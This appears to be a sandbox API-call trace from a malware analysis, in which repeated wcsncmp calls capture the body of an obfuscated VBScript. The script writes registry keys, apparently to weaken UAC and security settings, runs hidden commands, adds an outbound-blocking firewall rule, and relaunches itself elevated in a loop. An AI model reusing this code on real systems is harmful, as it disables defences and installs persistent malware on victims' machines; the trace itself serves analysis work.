bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.377] wcsncmp (_String1="r2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.378] wcsncmp (_String1="2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0226.378] wcsncmp (_String1="\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.378] wcsncmp (_String1="\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.378] wcsncmp (_String1="newRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 